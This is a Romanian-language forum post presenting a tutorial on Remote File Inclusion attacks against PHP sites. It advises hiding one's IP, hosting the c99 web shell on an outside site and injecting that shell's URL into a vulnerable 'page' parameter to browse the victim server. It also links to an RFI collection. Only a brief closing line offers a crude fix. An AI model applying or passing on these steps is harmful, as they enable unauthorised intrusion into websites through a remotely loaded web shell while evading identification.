welcome here ;)
poti gasi aici o parte din ce am adunat io dealungul timpului. credit la tot ce e pe acest forum : google
|
Nou pe simpatie: lonely_32 la Simpatie.ro
 | Femeie 24 ani Valcea cauta Barbat 26 - 57 ani |
|
|
welcome here ;)ReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
|
| #1 |
|
|
..::RFI - Remote File Inclusion::.. =================================== In primul rand avem nevoie de : 1.Un hide ip - recomand aol. Pentru a vedea daca ip-ul real a fost "inlocuit" folositi http://whatismyip.org/ 2.Un site unde sa avem urcat shellul. ( recomand c99 , este mai usor de navigat ) =================================== Aceasta vulnerabilitate afecteaza index.php . In index.php vulnerabilitate este urmatoarea: " require($page . “pagina.php”); " Exemplu: Avem siteul urmator: http://test.com/index.php , pentru a gasi "RFI-ul" va trebui sa ne uitam in sursa paginii . Click dreapta - View Page Source , apasam Ctrl+F si cautam ceva de genu : index.php? Sa zicem ca am gasit index.php?page=2. Pentru a testa daca siteul este vulnerabil vom reforumula link-ul , exemplu : http://test.com/index.php?page=http://s ... ro/c99.txt? - Press Enter Daca siteul nostru test.com este vulnerabil vom putea naviga prin directoarele dupa server . ==================================== Cum "reparam" aceasta vulnerabilitate ?
Cum am spus si mai sus : in index.php vulnerabilitatea este : require($page. "pagina.php"); Pentru a repara bugul va trebui sa stergem "$page." , exemplu : require("pagina.php"); =====================================
collection of rfi : http://rapidshare.com/files/78712425/Co ... s.rar.html
|
|
| |
|